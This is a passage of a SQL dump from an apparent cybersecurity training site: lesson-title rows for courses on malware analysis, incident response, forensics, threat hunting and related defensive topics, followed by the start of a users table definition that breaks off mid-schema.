(261, 26, 'Malware Categories', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(262, 26, 'Static vs Dynamic Analysis', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(263, 26, 'Setting Up a Safe Lab', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(264, 26, 'Static Analysis Tools', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(265, 26, 'Dynamic Analysis (Sandboxing)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(266, 26, 'Identifying IOCs from Malware', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(267, 26, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 22:57:14', NULL),
(271, 27, 'What is Incident Response?', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(272, 27, 'The IR Lifecycle (NIST)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(273, 27, 'Phase 1: Preparation', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(274, 27, 'Phase 2: Detection & Analysis', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(275, 27, 'Phase 3: Containment', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(276, 27, 'Phase 4: Eradication & Recovery', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(277, 27, 'Phase 5: Post-Incident Activity', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(278, 27, 'Final Quiz', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:03:48', NULL),
(281, 28, 'What is Digital Forensics?', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(282, 28, 'The Forensic Process', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(283, 28, 'Evidence Handling & Chain of Custody', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(284, 28, 'Disk Imaging & Acquisition', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(285, 28, 'File System Analysis (NTFS/ext4)', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(286, 28, 'Windows Artifacts', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(287, 28, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:05:09', NULL),
(291, 29, 'Why Analyze Network Traffic?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(292, 29, 'Packet Capture Fundamentals', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(293, 29, 'Wireshark Essentials', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(294, 29, 'Analyzing TCP/HTTP Traffic', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(295, 29, 'Detecting Malicious Traffic', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(296, 29, 'Zeek (Bro) for Network Logs', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(297, 29, 'Final Quiz', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:06:44', NULL),
(301, 30, 'What is Threat Hunting?', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(302, 30, 'Hunting vs Detection', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(303, 30, 'The Hunting Loop', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(304, 30, 'Hypothesis-Driven Hunting', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(305, 30, 'Data Sources for Hunting', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(306, 30, 'Hunting Techniques', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(307, 30, 'Final Quiz', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:08:10', NULL),
(311, 31, 'What is MITRE ATT&CK?', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(312, 31, 'Tactics: The \"Why\"', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(313, 31, 'Techniques: The \"How\"', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(314, 31, 'Navigating the Matrix', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(315, 31, 'Using ATT&CK for Defense', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(316, 31, 'Final Quiz', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:09:24', NULL),
(321, 32, 'Cloud Service Models (IaaS/PaaS/SaaS)', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(322, 32, 'Shared Responsibility Model', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(323, 32, 'AWS Security Fundamentals', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(324, 32, 'Azure Security Fundamentals', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(325, 32, 'Cloud Misconfigurations', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(326, 32, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:10:39', NULL),
(331, 33, 'Why Automate Security?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(332, 33, 'SOAR Platforms Overview', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(333, 33, 'Playbook Design Principles', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(334, 33, 'Common Automation Use Cases', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(335, 33, 'Python for Security Automation', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(336, 33, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:11:57', NULL),
(341, 34, 'Why Documentation Matters', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(342, 34, 'Incident Timelines', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(343, 34, 'Writing Effective Reports', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(344, 34, 'Executive Summaries', NULL, 'reading', NULL, 50, 6, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(345, 34, 'Metrics and KPIs', NULL, 'reading', NULL, 50, 7, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(346, 34, 'Final Quiz', NULL, 'reading', NULL, 50, 8, 1, '2025-12-26 02:45:47', '2025-12-26 23:13:12', NULL),
(349, 49, 'Understanding EDR Telemetry', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2026-03-12 21:42:07', 237),
(350, 49, 'Analyzing Process Trees', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 233),
(351, 49, 'Detecting Lateral Movement', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 234),
(352, 49, 'Memory Injection Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 235),
(353, 49, 'Isolating infected Hosts', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 236),
(359, 51, 'Writing SPL (Search Processing Language)', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:30', '2025-12-26 18:15:01', 242),
(360, 51, 'Correlating Events', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-26 18:15:01', 243),
(361, 36, 'SIEM Architecture Deep Dive', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 244),
(362, 36, 'Log Parsing & Normalization', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 245),
(363, 36, 'Advanced Correlation Rules', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 246),
(364, 36, 'Query Optimization', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 247),
(365, 36, 'Building Detection-as-Code', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 248),
(366, 36, 'Final Quiz', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:16:31', 249),
(367, 52, 'Phishing vs Spear Phishing', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 304),
(368, 52, 'URL Analysis', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 303),
(369, 53, 'CVSS Scoring System', NULL, 'reading', NULL, 50, 1, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 920),
(370, 53, 'Prioritizing Patches', NULL, 'reading', NULL, 50, 2, 1, '2025-12-26 17:59:31', '2026-03-15 02:37:40', 871),
(371, 37, 'Why Memory Forensics?', NULL, 'reading', NULL, 50, 3, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(372, 37, 'Memory Acquisition Techniques', NULL, 'reading', NULL, 50, 4, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(373, 37, 'Volatility Framework Deep Dive', NULL, 'reading', NULL, 50, 5, 1, '2025-12-26 17:59:31', '2025-12-27 02:18:03', NULL),
(374, 37, 'Process Analysis & Injection Detection', NULL, 'reading', NULL, 50, 374, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(375, 37, 'Hunting Rootkits & Hidden Processes', NULL, 'reading', NULL, 50, 375, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(376, 37, 'Final Quiz', NULL, 'reading', NULL, 50, 376, 1, '2025-12-27 02:18:03', '2025-12-27 02:18:03', NULL),
(381, 38, 'RE Fundamentals & Tools', NULL, 'reading', NULL, 50, 381, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(382, 38, 'x86/x64 Assembly Essentials', NULL, 'reading', NULL, 50, 382, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(383, 38, 'Static Analysis with IDA/Ghidra', NULL, 'reading', NULL, 50, 383, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(384, 38, 'Debugging with x64dbg', NULL, 'reading', NULL, 50, 384, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(385, 38, 'Unpacking & Anti-Analysis', NULL, 'reading', NULL, 50, 385, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(386, 38, 'Final Quiz', NULL, 'reading', NULL, 50, 386, 1, '2025-12-27 02:19:34', '2025-12-27 02:19:34', NULL),
(391, 39, 'Threat Intel Lifecycle', NULL, 'reading', NULL, 50, 391, 1, '2025-12-27 02:21:00', '2025-12-27 02:21:00', NULL),
(392, 39, 'Collection & Sources', NULL, 'reading', NULL, 50, 392, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(393, 39, 'Analysis & Attribution', NULL, 'reading', NULL, 50, 393, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(394, 39, 'STIX/TAXII & Sharing', NULL, 'reading', NULL, 50, 394, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(395, 39, 'Operationalizing Intel', NULL, 'reading', NULL, 50, 395, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(396, 39, 'Final Quiz', NULL, 'reading', NULL, 50, 396, 1, '2025-12-27 02:21:01', '2025-12-27 02:21:01', NULL),
(401, 40, 'Red, Blue, and Purple Teams', NULL, 'reading', NULL, 50, 401, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(402, 40, 'Red Team Operations', NULL, 'reading', NULL, 50, 402, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(403, 40, 'Blue Team Defense', NULL, 'reading', NULL, 50, 403, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(404, 40, 'Purple Team Exercises', NULL, 'reading', NULL, 50, 404, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(405, 40, 'Adversary Emulation', NULL, 'reading', NULL, 50, 405, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(406, 40, 'Final Quiz', NULL, 'reading', NULL, 50, 406, 1, '2025-12-27 02:22:23', '2025-12-27 02:22:23', NULL),
(411, 41, 'Exercise Framework Setup', NULL, 'reading', NULL, 50, 411, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(412, 41, 'Exercise: Credential Dumping', NULL, 'reading', NULL, 50, 412, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(413, 41, 'Exercise: Lateral Movement', NULL, 'reading', NULL, 50, 413, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(414, 41, 'Exercise: Data Exfiltration', NULL, 'reading', NULL, 50, 414, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(415, 41, 'Metrics & Reporting', NULL, 'reading', NULL, 50, 415, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(416, 41, 'Final Quiz', NULL, 'reading', NULL, 50, 416, 1, '2025-12-27 02:26:00', '2025-12-27 02:26:00', NULL),
(421, 42, 'Container Security Fundamentals', NULL, 'reading', NULL, 50, 421, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(422, 42, 'Docker Security Hardening', NULL, 'reading', NULL, 50, 422, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(423, 42, 'Kubernetes Security', NULL, 'reading', NULL, 50, 423, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(424, 42, 'Container Image Security', NULL, 'reading', NULL, 50, 424, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(425, 42, 'Runtime Protection', NULL, 'reading', NULL, 50, 425, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(426, 42, 'Final Quiz', NULL, 'reading', NULL, 50, 426, 1, '2025-12-27 02:27:22', '2025-12-27 02:27:22', NULL),
(431, 43, 'Zero Trust Principles', NULL, 'reading', NULL, 50, 431, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(432, 43, 'Identity as the Perimeter', NULL, 'reading', NULL, 50, 432, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(433, 43, 'Microsegmentation', NULL, 'reading', NULL, 50, 433, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(434, 43, 'Continuous Verification', NULL, 'reading', NULL, 50, 434, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(435, 43, 'Zero Trust Implementation', NULL, 'reading', NULL, 50, 435, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(436, 43, 'Final Quiz', NULL, 'reading', NULL, 50, 436, 1, '2025-12-27 02:28:42', '2025-12-27 02:28:42', NULL),
(441, 44, 'Security Frameworks Overview', NULL, 'reading', NULL, 50, 441, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(442, 44, 'NIST Cybersecurity Framework', NULL, 'reading', NULL, 50, 442, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(443, 44, 'ISO 27001 & 27002', NULL, 'reading', NULL, 50, 443, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(444, 44, 'SOC 2 Compliance', NULL, 'reading', NULL, 50, 444, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(445, 44, 'PCI-DSS & HIPAA', NULL, 'reading', NULL, 50, 445, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(446, 44, 'Final Quiz', NULL, 'reading', NULL, 50, 446, 1, '2025-12-27 02:30:07', '2025-12-27 02:30:07', NULL),
(765, 117, 'What is Cyber Threat Intelligence?', 'Define CTI and understand the Pyramid of Value.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:44', '2025-12-29 13:30:44', NULL),
(766, 117, 'The Intelligence Cycle', 'The 6 phases of CTI production.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(767, 117, 'Types of Threat Intelligence', 'Strategic, Operational, and Tactical.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(768, 117, 'Module 1 Assessment', 'Test your knowledge of CTI Fundamentals.', 'quiz', NULL, 100, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(769, 118, 'Introduction to OSINT', 'What is OSINT, The Framework, and OPSEC.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(770, 118, 'Domain & Infrastructure Recon', 'DNS, WHOIS, and Certificate Transparency.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(771, 118, 'Social Media & HUMINT', 'Investigating people and groups.', 'reading', NULL, 50, 3, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(772, 118, 'OSINT Tools Workshop', 'Hands-on: Google Dorks, Shodan, and Maltego.', 'reading', NULL, 50, 4, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(773, 118, 'Module 2 Assessment', 'Test your OSINT knowledge.', 'quiz', NULL, 100, 5, 1, '2025-12-29 13:30:45', '2025-12-29 13:30:45', NULL),
(774, 119, 'Introduction to Malware Analysis', 'Static vs Dynamic Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(775, 119, 'Key Indicators: Strings & Hashes', 'Extracting low-hanging fruit.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(776, 119, 'Module 3 Assessment', 'Test your Malware Analysis knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(777, 120, 'IOCs vs IOAs', 'Indicators of Compromise vs Attack.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(778, 120, 'Traffic Light Protocol (TLP)', 'Sharing standards.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(779, 120, 'Module 4 Assessment', 'Test your Indicators & Standards knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(780, 121, 'The ATT&CK Framework', 'Tactics, Techniques, and Procedures.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(781, 121, 'MITRE Navigator', 'Visualizing coverage.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(782, 121, 'Module 5 Assessment', 'Test your MITRE knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(783, 122, 'Introduction to Threat Hunting', 'The Hunter\'s Mindset: Assume Breach.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(784, 122, 'Hunting Techniques', 'Stacking and Clustering.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(785, 122, 'Module 6 Assessment', 'Test your Threat Hunting knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(786, 123, 'TIP Capabilities', 'Aggregation, Normalization, Dissemination.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(787, 123, 'MISP (Malware Information Sharing Platform)', 'The open source standard.', 'reading', NULL, 50, 2, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(788, 123, 'Module 7 Assessment', 'Test your TIP knowledge.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(789, 124, 'Writing Effective Intel Reports', 'BLUF, Estimative Language, and Audience Analysis.', 'reading', NULL, 50, 1, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(790, 124, 'Module 8 Assessment', 'Final Module Assessment.', 'quiz', NULL, 100, 3, 1, '2025-12-29 13:38:32', '2025-12-29 13:38:32', NULL),
(791, 125, 'The Incident Response Lifecycle (PICERL)', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(792, 125, 'Introduction to Digital Forensics', NULL, 'reading', NULL, 100, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(793, 125, 'Chain of Custody & Evidence Handling', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(794, 125, 'Locard\'s Exchange Principle & Order of Volatility', NULL, 'reading', NULL, 120, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(795, 126, 'First Responder Operations', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(796, 126, 'Disk Acquisition & Write Blockers', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(797, 126, 'Memory (RAM) Acquisition', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(798, 126, 'Network Evidence Acquisition', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(799, 127, 'The Windows Registry', NULL, 'reading', NULL, 110, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(800, 127, 'Windows Event Logs', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(801, 127, 'Evidence of Execution (Prefetch & Shimcache)', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(802, 127, 'File System Artifacts (MFT, LNK, and Recycle Bin)', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(803, 128, 'Introduction to Volatility', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(804, 128, 'Process Enumeration (pslist vs psscan)', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(805, 128, 'Network Connections & Command Line Logs', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(806, 128, 'Hunting Advanced Malware (Malfind)', NULL, 'reading', NULL, 120, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(807, 129, 'Introduction to Packet Captures', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(808, 129, 'Wireshark Fundamentals', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(809, 129, 'Analyzing DNS & HTTP Traffic', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(810, 129, 'Tshark & Command Line Analysis', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(811, 130, 'Preparation & Identification', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(812, 130, 'Containment', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(813, 130, 'Eradication & Recovery', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(814, 130, 'Lessons Learned (Post-Incident Activity)', NULL, 'reading', NULL, 100, 4, 1, '2026-03-09 22:28:54', '2026-03-09 22:28:54', NULL),
(815, 131, 'The OSI & TCP/IP Models', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(816, 131, 'TCP vs UDP', NULL, 'reading', NULL, 100, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(817, 131, 'Core Protocols & Services', NULL, 'reading', NULL, 120, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(818, 132, 'Navigating Wireshark', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(819, 132, 'Mastering Display Filters', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(820, 132, 'Following Streams & Object Extraction', NULL, 'reading', NULL, 110, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(821, 133, 'ARP Spoofing & Poisoning', NULL, 'reading', NULL, 110, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(822, 133, 'DNS Spoofing & Hijacking', NULL, 'reading', NULL, 120, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(823, 133, 'Network Denial of Service (DoS)', NULL, 'reading', NULL, 100, 3, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(824, 134, 'Firewalls: The First Line of Defense', NULL, 'reading', NULL, 100, 1, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL),
(825, 134, 'IDS vs IPS', NULL, 'reading', NULL, 110, 2, 1, '2026-03-09 22:28:55', '2026-03-09 22:28:55', NULL);

-- --------------------------------------------------------

--
-- Table structure for table `users`
--

CREATE TABLE `users` (
  `id` int(11) NOT NULL,
  `google_id` varchar(255) DEFAULT NULL,
  `name` varchar(255) NOT NULL,
  `email` varchar(255) NOT NULL,
  `password` varchar(255) DEFAULT NULL,
  `role` enum('normal','admin','alert-admin','pro') DEFAULT 'normal',
  `profile_picture` varchar(255) DEFAULT NULL,
  `subscription_plan` varchar(50) DEFAULT 'free',
  `subscription_status` varchar(50) DEFAULT 'active',
  `subscription_id` varchar(255) DEFAULT NULL,
  `customer_id` varchar(255) DEFAULT NULL,
  `cancel_at_period_end` tinyint(1) DEFAULT 0,
  `current_period_end` datetime DEFAULT NULL,
  `plan_start_date` datetime DEFAULT NULL,
  `plan_end_date` datetime DEFAULT NULL,
  `renewal_date` datetime DEFAULT NULL,
  `alerts_this_month` int(11) DEFAULT 0,
  `last_usage_reset` datetime DEFAULT current_timestamp(),
  `username` varchar(255) DEFAULT NULL,
  `surname` varchar(255) DEFAULT NULL,
  `is_verified` tinyint(1) DEFAULT 0,
  `verification_token` varchar(255) DEFAULT NULL,
  `reset_password_token` varchar(255) DEFAULT NULL,
  `reset_password_expires` datetime DEFAULT NULL,
  `failed_login_attempts` int(11) DEFAULT 0,
  `lock_until` datetime DEFAULT NULL,
  `badges` text DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT current_timestamp(),
  `subscription_end_date` datetime DEFAULT NULL,
  `current_mission` int(11) DEFAULT 1,
  `training_completed` tinyint(1) DEFAULT 0,
